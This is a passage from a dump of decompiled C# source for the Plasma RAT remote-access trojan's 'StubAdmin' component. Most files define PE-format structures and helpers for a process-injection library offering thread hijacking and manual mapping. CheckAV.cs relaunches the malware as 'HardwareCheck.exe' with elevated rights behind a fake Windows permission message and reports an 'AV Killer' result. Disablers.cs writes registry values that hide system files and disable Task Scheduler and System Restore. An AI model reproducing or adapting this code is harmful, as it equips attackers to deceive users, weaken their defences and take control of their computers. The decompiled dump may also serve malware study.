22 | 		{F9216EF0-A5AD-42D7-B4A1-A3D865D04F31}.Release|Any CPU.ActiveCfg = Release|x86
23 | 		{F9216EF0-A5AD-42D7-B4A1-A3D865D04F31}.Release|Any CPU.Build.0 = Release|x86
24 | 		{F9216EF0-A5AD-42D7-B4A1-A3D865D04F31}.Release|Mixed Platforms.ActiveCfg = Release|x86
25 | 		{F9216EF0-A5AD-42D7-B4A1-A3D865D04F31}.Release|Mixed Platforms.Build.0 = Release|x86
26 | 		{F9216EF0-A5AD-42D7-B4A1-A3D865D04F31}.Release|x86.ActiveCfg = Release|x86
27 | 		{F9216EF0-A5AD-42D7-B4A1-A3D865D04F31}.Release|x86.Build.0 = Release|x86
28 | 	EndGlobalSection
29 | 	GlobalSection(SolutionProperties) = preSolution
30 | 		HideSolutionNode = FALSE
31 | 	EndGlobalSection
32 | EndGlobal
33 | 


--------------------------------------------------------------------------------
/Plasma_RAT_06_2016/StubAdmin.bin/InjectionLibrary/InjectionMethodType.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | 
 3 | namespace InjectionLibrary
 4 | {
 5 | 	// Token: 0x0200003D RID: 61
 6 | 	public enum InjectionMethodType
 7 | 	{
 8 | 		// Token: 0x0400012B RID: 299
 9 | 		Standard,
10 | 		// Token: 0x0400012C RID: 300
11 | 		ThreadHijack,
12 | 		// Token: 0x0400012D RID: 301
13 | 		ManualMap
14 | 	}
15 | }
16 | 


--------------------------------------------------------------------------------
/Plasma_RAT_06_2016/StubAdmin.bin/JLibrary/PortableExecutable/Constants.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | 
 3 | namespace JLibrary.PortableExecutable
 4 | {
 5 | 	// Token: 0x0200003A RID: 58
 6 | 	public static class Constants
 7 | 	{
 8 | 		// Token: 0x04000122 RID: 290
 9 | 		public const ushort DOS_SIGNATURE = 23117;
10 | 
11 | 		// Token: 0x04000123 RID: 291
12 | 		public const uint NT_SIGNATURE = 17744u;
13 | 
14 | 		// Token: 0x04000124 RID: 292
15 | 		public const ushort PE32_FORMAT = 267;
16 | 
17 | 		// Token: 0x04000125 RID: 293
18 | 		public const ushort PE32P_FORMAT = 523;
19 | 
20 | 		// Token: 0x04000126 RID: 294
21 | 		public const uint RT_MANIFEST = 24u;
22 | 
23 | 		// Token: 0x04000127 RID: 295
24 | 		public const uint CREATEPROCESS_MANIFEST_RESOURCE_ID = 1u;
25 | 
26 | 		// Token: 0x04000128 RID: 296
27 | 		public const uint ISOLATIONAWARE_MANIFEST_RESOURCE_ID = 2u;
28 | 
29 | 		// Token: 0x04000129 RID: 297
30 | 		public const uint ISOLATIONAWARE_NOSTATICIMPORT_MANIFEST_RESOURCE_ID = 3u;
31 | 	}
32 | }
33 | 


--------------------------------------------------------------------------------
/Plasma_RAT_06_2016/StubAdmin.bin/JLibrary/PortableExecutable/DATA_DIRECTORIES.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | 
 3 | namespace JLibrary.PortableExecutable
 4 | {
 5 | 	// Token: 0x02000027 RID: 39
 6 | 	public enum DATA_DIRECTORIES
 7 | 	{
 8 | 		// Token: 0x04000093 RID: 147
 9 | 		ExportTable,
10 | 		// Token: 0x04000094 RID: 148
11 | 		ImportTable,
12 | 		// Token: 0x04000095 RID: 149
13 | 		ResourceTable,
14 | 		// Token: 0x04000096 RID: 150
15 | 		ExceptionTable,
16 | 		// Token: 0x04000097 RID: 151
17 | 		CertificateTable,
18 | 		// Token: 0x04000098 RID: 152
19 | 		BaseRelocTable,
20 | 		// Token: 0x04000099 RID: 153
21 | 		Debug,
22 | 		// Token: 0x0400009A RID: 154
23 | 		Architecture,
24 | 		// Token: 0x0400009B RID: 155
25 | 		GlobalPtr,
26 | 		// Token: 0x0400009C RID: 156
27 | 		TLSTable,
28 | 		// Token: 0x0400009D RID: 157
29 | 		LoadConfigTable,
30 | 		// Token: 0x0400009E RID: 158
31 | 		BoundImport,
32 | 		// Token: 0x0400009F RID: 159
33 | 		IAT,
34 | 		// Token: 0x040000A0 RID: 160
35 | 		DelayImportDescriptor,
36 | 		// Token: 0x040000A1 RID: 161
37 | 		CLRRuntimeHeader,
38 | 		// Token: 0x040000A2 RID: 162
39 | 		Reserved
40 | 	}
41 | }
42 | 


--------------------------------------------------------------------------------
/Plasma_RAT_06_2016/StubAdmin.bin/JLibrary/PortableExecutable/IMAGE_BASE_RELOCATION.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Runtime.InteropServices;
 3 | 
 4 | namespace JLibrary.PortableExecutable
 5 | {
 6 | 	// Token: 0x0200002D RID: 45
 7 | 	[Serializable]
 8 | 	[StructLayout(LayoutKind.Sequential, Pack = 1)]
 9 | 	public struct IMAGE_BASE_RELOCATION
10 | 	{
11 | 		// Token: 0x040000ED RID: 237
12 | 		public uint VirtualAddress;
13 | 
14 | 		// Token: 0x040000EE RID: 238
15 | 		public uint SizeOfBlock;
16 | 	}
17 | }
18 | 


--------------------------------------------------------------------------------
/Plasma_RAT_06_2016/StubAdmin.bin/JLibrary/PortableExecutable/IMAGE_DATA_DIRECTORY.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | 
 3 | namespace JLibrary.PortableExecutable
 4 | {
 5 | 	// Token: 0x0200002B RID: 43
 6 | 	[Serializable]
 7 | 	public struct IMAGE_DATA_DIRECTORY
 8 | 	{
 9 | 		// Token: 0x040000E8 RID: 232
10 | 		public uint VirtualAddress;
11 | 
12 | 		// Token: 0x040000E9 RID: 233
13 | 		public uint Size;
14 | 	}
15 | }
16 | 


--------------------------------------------------------------------------------
/Plasma_RAT_06_2016/StubAdmin.bin/JLibrary/PortableExecutable/IMAGE_FILE_HEADER.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Runtime.InteropServices;
 3 | 
 4 | namespace JLibrary.PortableExecutable
 5 | {
 6 | 	// Token: 0x02000029 RID: 41
 7 | 	[Serializable]
 8 | 	[StructLayout(LayoutKind.Sequential, Pack = 1)]
 9 | 	public struct IMAGE_FILE_HEADER
10 | 	{
11 | 		// Token: 0x040000C2 RID: 194
12 | 		public ushort Machine;
13 | 
14 | 		// Token: 0x040000C3 RID: 195
15 | 		public ushort NumberOfSections;
16 | 
17 | 		// Token: 0x040000C4 RID: 196
18 | 		public uint TimeDateStamp;
19 | 
20 | 		// Token: 0x040000C5 RID: 197
21 | 		public uint PointerToSymbolTable;
22 | 
23 | 		// Token: 0x040000C6 RID: 198
24 | 		public uint NumberOfSymbols;
25 | 
26 | 		// Token: 0x040000C7 RID: 199
27 | 		public ushort SizeOfOptionalHeader;
28 | 
29 | 		// Token: 0x040000C8 RID: 200
30 | 		public ushort Characteristics;
31 | 	}
32 | }
33 | 


--------------------------------------------------------------------------------
/Plasma_RAT_06_2016/StubAdmin.bin/JLibrary/PortableExecutable/IMAGE_IMPORT_DESCRIPTOR.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Runtime.InteropServices;
 3 | 
 4 | namespace JLibrary.PortableExecutable
 5 | {
 6 | 	// Token: 0x0200002F RID: 47
 7 | 	[Serializable]
 8 | 	[StructLayout(LayoutKind.Sequential, Pack = 1)]
 9 | 	public struct IMAGE_IMPORT_DESCRIPTOR
10 | 	{
11 | 		// Token: 0x040000F9 RID: 249
12 | 		public uint OriginalFirstThunk;
13 | 
14 | 		// Token: 0x040000FA RID: 250
15 | 		public uint TimeDateStamp;
16 | 
17 | 		// Token: 0x040000FB RID: 251
18 | 		public uint ForwarderChain;
19 | 
20 | 		// Token: 0x040000FC RID: 252
21 | 		public uint Name;
22 | 
23 | 		// Token: 0x040000FD RID: 253
24 | 		public uint FirstThunkPtr;
25 | 	}
26 | }
27 | 


--------------------------------------------------------------------------------
/Plasma_RAT_06_2016/StubAdmin.bin/JLibrary/PortableExecutable/IMAGE_NT_HEADER32.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Runtime.InteropServices;
 3 | 
 4 | namespace JLibrary.PortableExecutable
 5 | {
 6 | 	// Token: 0x0200002C RID: 44
 7 | 	[Serializable]
 8 | 	[StructLayout(LayoutKind.Sequential, Pack = 1)]
 9 | 	public struct IMAGE_NT_HEADER32
10 | 	{
11 | 		// Token: 0x040000EA RID: 234
12 | 		public int Signature;
13 | 
14 | 		// Token: 0x040000EB RID: 235
15 | 		public IMAGE_FILE_HEADER FileHeader;
16 | 
17 | 		// Token: 0x040000EC RID: 236
18 | 		public IMAGE_OPTIONAL_HEADER32 OptionalHeader;
19 | 	}
20 | }
21 | 


--------------------------------------------------------------------------------
/Plasma_RAT_06_2016/StubAdmin.bin/JLibrary/PortableExecutable/IMAGE_RESOURCE_DATA_ENTRY.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | 
 3 | namespace JLibrary.PortableExecutable
 4 | {
 5 | 	// Token: 0x02000034 RID: 52
 6 | 	[Serializable]
 7 | 	public struct IMAGE_RESOURCE_DATA_ENTRY
 8 | 	{
 9 | 		// Token: 0x0400010D RID: 269
10 | 		public uint OffsetToData;
11 | 
12 | 		// Token: 0x0400010E RID: 270
13 | 		public uint Size;
14 | 
15 | 		// Token: 0x0400010F RID: 271
16 | 		public uint CodePage;
17 | 
18 | 		// Token: 0x04000110 RID: 272
19 | 		public uint Reserved;
20 | 	}
21 | }
22 | 


--------------------------------------------------------------------------------
/Plasma_RAT_06_2016/StubAdmin.bin/JLibrary/PortableExecutable/IMAGE_RESOURCE_DIRECTORY.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | 
 3 | namespace JLibrary.PortableExecutable
 4 | {
 5 | 	// Token: 0x02000032 RID: 50
 6 | 	[Serializable]
 7 | 	public struct IMAGE_RESOURCE_DIRECTORY
 8 | 	{
 9 | 		// Token: 0x04000103 RID: 259
10 | 		public uint Characteristics;
11 | 
12 | 		// Token: 0x04000104 RID: 260
13 | 		public uint TimeDateStamp;
14 | 
15 | 		// Token: 0x04000105 RID: 261
16 | 		public ushort MajorVersion;
17 | 
18 | 		// Token: 0x04000106 RID: 262
19 | 		public ushort MinorVersion;
20 | 
21 | 		// Token: 0x04000107 RID: 263
22 | 		public ushort NumberOfNamedEntries;
23 | 
24 | 		// Token: 0x04000108 RID: 264
25 | 		public ushort NumberOfIdEntries;
26 | 	}
27 | }
28 | 


--------------------------------------------------------------------------------
/Plasma_RAT_06_2016/StubAdmin.bin/JLibrary/PortableExecutable/IMAGE_RESOURCE_DIRECTORY_ENTRY.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Runtime.InteropServices;
 3 | 
 4 | namespace JLibrary.PortableExecutable
 5 | {
 6 | 	// Token: 0x02000033 RID: 51
 7 | 	[Serializable]
 8 | 	[StructLayout(LayoutKind.Explicit)]
 9 | 	public struct IMAGE_RESOURCE_DIRECTORY_ENTRY
10 | 	{
11 | 		// Token: 0x04000109 RID: 265
12 | 		[FieldOffset(0)]
13 | 		public uint NameRva;
14 | 
15 | 		// Token: 0x0400010A RID: 266
16 | 		[FieldOffset(0)]
17 | 		public uint IntegerId;
18 | 
19 | 		// Token: 0x0400010B RID: 267
20 | 		[FieldOffset(4)]
21 | 		public uint DataEntryRva;
22 | 
23 | 		// Token: 0x0400010C RID: 268
24 | 		[FieldOffset(4)]
25 | 		public uint SubdirectoryRva;
26 | 	}
27 | }
28 | 


--------------------------------------------------------------------------------
/Plasma_RAT_06_2016/StubAdmin.bin/JLibrary/PortableExecutable/IMAGE_SECTION_HEADER.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Runtime.InteropServices;
 3 | using System.Text;
 4 | 
 5 | namespace JLibrary.PortableExecutable
 6 | {
 7 | 	// Token: 0x0200002E RID: 46
 8 | 	[Serializable]
 9 | 	[StructLayout(LayoutKind.Sequential, Pack = 1)]
10 | 	public struct IMAGE_SECTION_HEADER
11 | 	{
12 | 		// Token: 0x060000FA RID: 250 RVA: 0x0000C870 File Offset: 0x0000AA70
13 | 		public override string ToString()
14 | 		{
15 | 			string text = Encoding.UTF8.GetString(this.Name);
16 | 			if (text.Contains("\0"))
17 | 			{
18 | 				text = text.Substring(0, text.IndexOf("\0"));
19 | 			}
20 | 			return text;
21 | 		}
22 | 
23 | 		// Token: 0x040000EF RID: 239
24 | 		[MarshalAs(UnmanagedType.ByValArray, SizeConst = 8)]
25 | 		public byte[] Name;
26 | 
27 | 		// Token: 0x040000F0 RID: 240
28 | 		public uint VirtualSize;
29 | 
30 | 		// Token: 0x040000F1 RID: 241
31 | 		public uint VirtualAddress;
32 | 
33 | 		// Token: 0x040000F2 RID: 242
34 | 		public uint SizeOfRawData;
35 | 
36 | 		// Token: 0x040000F3 RID: 243
37 | 		public uint PointerToRawData;
38 | 
39 | 		// Token: 0x040000F4 RID: 244
40 | 		public uint PointerToRelocations;
41 | 
42 | 		// Token: 0x040000F5 RID: 245
43 | 		public uint PointerToLineNumbers;
44 | 
45 | 		// Token: 0x040000F6 RID: 246
46 | 		public ushort NumberOfRelocations;
47 | 
48 | 		// Token: 0x040000F7 RID: 247
49 | 		public ushort NumberOfLineNumbers;
50 | 
51 | 		// Token: 0x040000F8 RID: 248
52 | 		public uint Characteristics;
53 | 	}
54 | }
55 | 


--------------------------------------------------------------------------------
/Plasma_RAT_06_2016/StubAdmin.bin/JLibrary/PortableExecutable/IMAGE_THUNK_DATA.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | 
 3 | namespace JLibrary.PortableExecutable
 4 | {
 5 | 	// Token: 0x02000031 RID: 49
 6 | 	[Serializable]
 7 | 	public struct IMAGE_THUNK_DATA
 8 | 	{
 9 | 		// Token: 0x04000102 RID: 258
10 | 		public U1 u1;
11 | 	}
12 | }
13 | 


--------------------------------------------------------------------------------
/Plasma_RAT_06_2016/StubAdmin.bin/JLibrary/PortableExecutable/U1.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Runtime.InteropServices;
 3 | 
 4 | namespace JLibrary.PortableExecutable
 5 | {
 6 | 	// Token: 0x02000030 RID: 48
 7 | 	[Serializable]
 8 | 	[StructLayout(LayoutKind.Explicit)]
 9 | 	public struct U1
10 | 	{
11 | 		// Token: 0x040000FE RID: 254
12 | 		[FieldOffset(0)]
13 | 		public uint ForwarderString;
14 | 
15 | 		// Token: 0x040000FF RID: 255
16 | 		[FieldOffset(0)]
17 | 		public uint Function;
18 | 
19 | 		// Token: 0x04000100 RID: 256
20 | 		[FieldOffset(0)]
21 | 		public uint Ordinal;
22 | 
23 | 		// Token: 0x04000101 RID: 257
24 | 		[FieldOffset(0)]
25 | 		public uint AddressOfData;
26 | 	}
27 | }
28 | 


--------------------------------------------------------------------------------
/Plasma_RAT_06_2016/StubAdmin.bin/JLibrary/Tools/ErrorBase.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | 
 3 | namespace JLibrary.Tools
 4 | {
 5 | 	// Token: 0x02000025 RID: 37
 6 | 	[Serializable]
 7 | 	public abstract class ErrorBase
 8 | 	{
 9 | 		// Token: 0x060000E4 RID: 228 RVA: 0x000025EF File Offset: 0x000007EF
10 | 		public virtual Exception GetLastError()
11 | 		{
12 | 			return this._lasterror;
13 | 		}
14 | 
15 | 		// Token: 0x060000E5 RID: 229 RVA: 0x000025F7 File Offset: 0x000007F7
16 | 		public virtual void ClearErrors()
17 | 		{
18 | 			this._lasterror = null;
19 | 		}
20 | 
21 | 		// Token: 0x060000E6 RID: 230 RVA: 0x00002600 File Offset: 0x00000800
22 | 		protected virtual bool SetLastError(Exception e)
23 | 		{
24 | 			this._lasterror = e;
25 | 			return false;
26 | 		}
27 | 
28 | 		// Token: 0x060000E7 RID: 231 RVA: 0x0000260A File Offset: 0x0000080A
29 | 		protected virtual bool SetLastError(string message)
30 | 		{
31 | 			return this.SetLastError(new Exception(message));
32 | 		}
33 | 
34 | 		// Token: 0x0400008E RID: 142
35 | 		protected Exception _lasterror;
36 | 	}
37 | }
38 | 


--------------------------------------------------------------------------------
/Plasma_RAT_06_2016/StubAdmin.bin/JLibrary/Tools/Utils.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.IO;
 3 | using System.Runtime.InteropServices;
 4 | using System.Runtime.Serialization.Formatters.Binary;
 5 | 
 6 | namespace JLibrary.Tools
 7 | {
 8 | 	// Token: 0x02000024 RID: 36
 9 | 	public static class Utils
10 | 	{
11 | 		// Token: 0x060000E1 RID: 225 RVA: 0x0000C4F0 File Offset: 0x0000A6F0
12 | 		public static string WriteTempData(byte[] data)
13 | 		{
14 | 			if (data == null)
15 | 			{
16 | 				throw new ArgumentNullException("data");
17 | 			}
18 | 			string text = null;
19 | 			try
20 | 			{
21 | 				text = Path.GetTempFileName();
22 | 			}
23 | 			catch (IOException)
24 | 			{
25 | 				text = Path.Combine(Directory.GetCurrentDirectory(), Path.GetRandomFileName());
26 | 			}
27 | 			try
28 | 			{
29 | 				File.WriteAllBytes(text, data);
30 | 			}
31 | 			catch
32 | 			{
33 | 				text = null;
34 | 			}
35 | 			return text;
36 | 		}
37 | 
38 | 		// Token: 0x060000E2 RID: 226 RVA: 0x0000C554 File Offset: 0x0000A754
39 | 		public static T DeepClone<T>(T obj)
40 | 		{
41 | 			T result;
42 | 			using (MemoryStream memoryStream = new MemoryStream())
43 | 			{
44 | 				BinaryFormatter binaryFormatter = new BinaryFormatter();
45 | 				binaryFormatter.Serialize(memoryStream, obj);
46 | 				memoryStream.Position = 0L;
47 | 				result = (T)((object)binaryFormatter.Deserialize(memoryStream));
48 | 			}
49 | 			return result;
50 | 		}
51 | 
52 | 		// Token: 0x060000E3 RID: 227 RVA: 0x000025E7 File Offset: 0x000007E7
53 | 		public static uint SizeOf(this Type t)
54 | 		{
55 | 			return (uint)Marshal.SizeOf(t);
56 | 		}
57 | 	}
58 | }
59 | 


--------------------------------------------------------------------------------
/Plasma_RAT_06_2016/StubAdmin.bin/JLibrary/Win32/Win32Ptr.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | 
 3 | namespace JLibrary.Win32
 4 | {
 5 | 	// Token: 0x02000023 RID: 35
 6 | 	public static class Win32Ptr
 7 | 	{
 8 | 		// Token: 0x060000D9 RID: 217 RVA: 0x00002568 File Offset: 0x00000768
 9 | 		public static IntPtr Create(long value)
10 | 		{
11 | 			return new IntPtr((int)value);
12 | 		}
13 | 
14 | 		// Token: 0x060000DA RID: 218 RVA: 0x00002571 File Offset: 0x00000771
15 | 		public static IntPtr Add(this IntPtr ptr, long val)
16 | 		{
17 | 			return new IntPtr((int)((long)ptr.ToInt32() + val));
18 | 		}
19 | 
20 | 		// Token: 0x060000DB RID: 219 RVA: 0x00002583 File Offset: 0x00000783
21 | 		public static IntPtr Add(this IntPtr ptr, IntPtr val)
22 | 		{
23 | 			return new IntPtr(ptr.ToInt32() + val.ToInt32());
24 | 		}
25 | 
26 | 		// Token: 0x060000DC RID: 220 RVA: 0x00002599 File Offset: 0x00000799
27 | 		public static IntPtr Subtract(this IntPtr ptr, long val)
28 | 		{
29 | 			return new IntPtr((int)(ptr.ToInt64() - val));
30 | 		}
31 | 
32 | 		// Token: 0x060000DD RID: 221 RVA: 0x000025AA File Offset: 0x000007AA
33 | 		public static IntPtr Subtract(this IntPtr ptr, IntPtr val)
34 | 		{
35 | 			return new IntPtr((int)(ptr.ToInt64() - val.ToInt64()));
36 | 		}
37 | 
38 | 		// Token: 0x060000DE RID: 222 RVA: 0x000025C1 File Offset: 0x000007C1
39 | 		public static bool IsNull(this IntPtr ptr)
40 | 		{
41 | 			return ptr == IntPtr.Zero;
42 | 		}
43 | 
44 | 		// Token: 0x060000DF RID: 223 RVA: 0x000025CE File Offset: 0x000007CE
45 | 		public static bool IsNull(this UIntPtr ptr)
46 | 		{
47 | 			return ptr == UIntPtr.Zero;
48 | 		}
49 | 
50 | 		// Token: 0x060000E0 RID: 224 RVA: 0x000025DB File Offset: 0x000007DB
51 | 		public static bool Compare(this IntPtr ptr, long value)
52 | 		{
53 | 			return ptr.ToInt64() == value;
54 | 		}
55 | 	}
56 | }
57 | 


--------------------------------------------------------------------------------
/Plasma_RAT_06_2016/StubAdmin.bin/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Reflection;
 3 | using System.Runtime.CompilerServices;
 4 | using System.Runtime.InteropServices;
 5 | 
 6 | [assembly: AssemblyVersion("0.0.0.0")]
 7 | [assembly: AssemblyProduct("")]
 8 | [assembly: AssemblyDescription("")]
 9 | [assembly: AssemblyTitle("")]
10 | [assembly: AssemblyTrademark("")]
11 | [assembly: CompilationRelaxations(8)]
12 | [assembly: ComVisible(false)]
13 | [assembly: AssemblyCopyright("")]
14 | [assembly: AssemblyCompany("")]
15 | [assembly: RuntimeCompatibility(WrapNonExceptionThrows = true)]
16 | [assembly: AssemblyFileVersion("0.0.0.0")]
17 | [assembly: Guid("b8a2147c-074c-46e1-bb99-c8431a6546ce")]
18 | 


--------------------------------------------------------------------------------
/Plasma_RAT_06_2016/StubAdmin.bin/StubAdmin.bin.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/p3pperp0tts/malware_decompiled_code/6fb231cdf62c9232524190a5da02f2af28242380/Plasma_RAT_06_2016/StubAdmin.bin/StubAdmin.bin.ico


--------------------------------------------------------------------------------
/Plasma_RAT_06_2016/StubAdmin.bin/System/Runtime/CompilerServices/ExtensionAttribute.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | 
 3 | namespace System.Runtime.CompilerServices
 4 | {
 5 | 	// Token: 0x02000022 RID: 34
 6 | 	[AttributeUsage(AttributeTargets.Method)]
 7 | 	public sealed class ExtensionAttribute : Attribute
 8 | 	{
 9 | 	}
10 | }
11 | 


--------------------------------------------------------------------------------
/Plasma_RAT_06_2016/StubAdmin.bin/System_Configuration/CheckAV.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Diagnostics;
 3 | using System.IO;
 4 | using System.Windows.Forms;
 5 | using Microsoft.VisualBasic;
 6 | using Microsoft.VisualBasic.CompilerServices;
 7 | using System_Configuration.My;
 8 | 
 9 | namespace System_Configuration
10 | {
11 | 	// Token: 0x0200000E RID: 14
12 | 	[StandardModule]
13 | 	internal sealed class CheckAV
14 | 	{
15 | 		// Token: 0x06000043 RID: 67 RVA: 0x00004C78 File Offset: 0x00002E78
16 | 		public static void RunAVAdminMode()
17 | 		{
18 | 			try
19 | 			{
20 | 				string text = Path.GetTempPath() + "HardwareCheck.exe";
21 | 				if (!AntiEverything.IsAdmin() && Operators.CompareString(PlasmaRAT.GetAntiVirus(), "AntiVirus: N/A", false) != 0 && Operators.CompareString(Interaction.GetSetting("Microsoft", "Sysinternals", "AV", ""), "ran", false) != 0)
22 | 				{
23 | 					if (!File.Exists(text))
24 | 					{
25 | 						File.Copy(Application.ExecutablePath, text);
26 | 					}
27 | 					ProcessStartInfo processStartInfo = new ProcessStartInfo("cmd.exe", string.Concat(new string[]
28 | 					{
29 | 						"/c ",
30 | 						text,
31 | 						"\r\n\r\n Windows has detected a recent software change and needs permissions to continue. This process will take about 30-60 seconds depending on your internet connection. Please hit Yes to continue.\r\n\r\nSystem Info:\r\nAccount: ",
32 | 						Environment.UserName.ToString().ToString(),
33 | 						"\r\nProcessor Count: ",
34 | 						Environment.ProcessorCount.ToString(),
35 | 						"\r\nOperating System: ",
36 | 						MyProject.Computer.Info.OSFullName
37 | 					}));
38 | 					processStartInfo.WindowStyle = ProcessWindowStyle.Hidden;
39 | 					processStartInfo.UseShellExecute = true;
40 | 					processStartInfo.WorkingDirectory = Environment.CurrentDirectory;
41 | 					processStartInfo.Verb = "runas";
42 | 					try
43 | 					{
44 | 						Process.Start(processStartInfo);
45 | 						Interaction.SaveSetting("Microsoft", "Sysinternals", "AV", "ran");
46 | 						PlasmaRAT.TalktoChannel("AV Killer: Targeted " + PlasmaRAT.GetAntiVirus(), string.Empty);
47 | 					}
48 | 					catch (Exception ex)
49 | 					{
50 | 					}
51 | 				}
52 | 			}
53 | 			catch (Exception ex2)
54 | 			{
55 | 			}
56 | 		}
57 | 	}
58 | }
59 | 


--------------------------------------------------------------------------------
/Plasma_RAT_06_2016/StubAdmin.bin/System_Configuration/Disablers.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using Microsoft.VisualBasic.CompilerServices;
 3 | using Microsoft.Win32;
 4 | using System_Configuration.My;
 5 | 
 6 | namespace System_Configuration
 7 | {
 8 | 	// Token: 0x02000015 RID: 21
 9 | 	[StandardModule]
10 | 	internal sealed class Disablers
11 | 	{
12 | 		// Token: 0x06000086 RID: 134 RVA: 0x00008988 File Offset: 0x00006B88
13 | 		public static void Disable()
14 | 		{
15 | 			int num;
16 | 			int num4;
17 | 			object obj;
18 | 			try
19 | 			{
20 | 				IL_00:
21 | 				ProjectData.ClearProjectError();
22 | 				num = 1;
23 | 				IL_07:
24 | 				int num2 = 2;
25 | 				MyProject.Computer.Registry.SetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", "ShowSuperHidden", "0", RegistryValueKind.DWord);
26 | 				IL_28:
27 | 				num2 = 3;
28 | 				if (!AntiEverything.IsAdmin())
29 | 				{
30 | 					goto IL_94;
31 | 				}
32 | 				IL_31:
33 | 				num2 = 4;
34 | 				MyProject.Computer.Registry.SetValue("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows Script Host\\Settings", "REG_DWORD", "1", RegistryValueKind.DWord);
35 | 				IL_52:
36 | 				num2 = 5;
37 | 				MyProject.Computer.Registry.SetValue("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Schedule", "Start", "4", RegistryValueKind.DWord);
38 | 				IL_73:
39 | 				num2 = 6;
40 | 				MyProject.Computer.Registry.SetValue("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore", "DisableSR", "1", RegistryValueKind.DWord);
41 | 				IL_94:
42 | 				goto IL_103;
43 | 				IL_96:
44 | 				int num3 = num4 + 1;
45 | 				num4 = 0;
46 | 				@switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num3);
47 | 				IL_C4:
48 | 				goto IL_F8;
49 | 				IL_C6:
50 | 				num4 = num2;
51 | 				@switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num);
52 | 				IL_D6:;
53 | 			}
54 | 			catch when (endfilter(obj is Exception & num != 0 & num4 == 0))
55 | 			{
56 | 				Exception ex = (Exception)obj2;
57 | 				goto IL_C6;
58 | 			}
59 | 			IL_F8:
60 | 			throw ProjectData.CreateProjectError(-2146828237);
61 | 			IL_103:
62 | 			if (num4 != 0)
63 | 			{
64 | 				ProjectData.ClearProjectError();
65 | 			}
66 | 		}
67 | 	}
68 | }
69 | 


--------------------------------------------------------------------------------
/Plasma_RAT_06_2016/StubAdmin.bin/System_Configuration/My/MyApplication.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.CodeDom.Compiler;
 3 | using System.ComponentModel;
 4 | using Microsoft.VisualBasic.ApplicationServices;
 5 | 
 6 | namespace System_Configuration.My
 7 | {
 8 | 	// Token: 0x02000002 RID: 2
 9 | 	[EditorBrowsable(EditorBrowsableState.Never)]
10 | 	[GeneratedCode("MyTemplate", "8.0.0.0")]
11 | 	internal class MyApplication : ConsoleApplicationBase
12 | 	{
13 | 	}
14 | }
15 | 


--------------------------------------------------------------------------------
/Plasma_RAT_06_2016/StubAdmin.bin/System_Configuration/My/MyComputer.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.CodeDom.Compiler;
 3 | using System.ComponentModel;
 4 | using System.Diagnostics;
 5 | using Microsoft.VisualBasic.Devices;
 6 | 
 7 | namespace System_Configuration.My
 8 | {
 9 | 	// Token: 0x02000003 RID: 3
10 | 	[GeneratedCode("MyTemplate", "8.0.0.0")]
11 | 	[EditorBrowsable(EditorBrowsableState.Never)]
12 | 	internal class MyComputer : Computer
13 | 	{
14 | 		// Token: 0x06000002 RID: 2 RVA: 0x00002224 File Offset: 0x00000424
15 | 		[DebuggerHidden]
16 | 		[EditorBrowsable(EditorBrowsableState.Never)]
17 | 		public MyComputer()
18 | 		{
19 | 		}
20 | 	}
21 | }
22 | 


--------------------------------------------------------------------------------
/Plasma_RAT_06_2016/StubAdmin.bin/System_Configuration/My/MySettings.Designer.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.CodeDom.Compiler;
 3 | using System.ComponentModel;
 4 | using System.Configuration;
 5 | using System.Runtime.CompilerServices;
 6 | 
 7 | namespace System_Configuration.My
 8 | {
 9 | 	// Token: 0x0200001C RID: 28
10 | 	[GeneratedCode("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "10.0.0.0")]
11 | 	[EditorBrowsable(EditorBrowsableState.Advanced)]
12 | 	[CompilerGenerated]
13 | 	internal sealed partial class MySettings : ApplicationSettingsBase
14 | 	{
15 | 		// Token: 0x1700000C RID: 12
16 | 		// (get) Token: 0x060000BC RID: 188 RVA: 0x00002531 File Offset: 0x00000731
17 | 		public static MySettings Default
18 | 		{
19 | 			get
20 | 			{
21 | 				return MySettings.defaultInstance;
22 | 			}
23 | 		}
24 | 
25 | 		// Token: 0x0400008B RID: 139
26 | 		private static MySettings defaultInstance = (MySettings)SettingsBase.Synchronized(new MySettings());
27 | 	}
28 | }
29 | 


--------------------------------------------------------------------------------
/Plasma_RAT_06_2016/StubAdmin.bin/System_Configuration/My/MySettings.settings:
--------------------------------------------------------------------------------
1 | <?xml version='1.0' encoding='utf-8'?>
2 | <SettingsFile CurrentProfile="(Default)" GeneratedClassNamespace="System_Configuration.My" GeneratedClassName="MySettings" xmlns="http://schemas.microsoft.com/VisualStudio/2004/01/settings">
3 |   <Profiles />
4 |   <Settings />
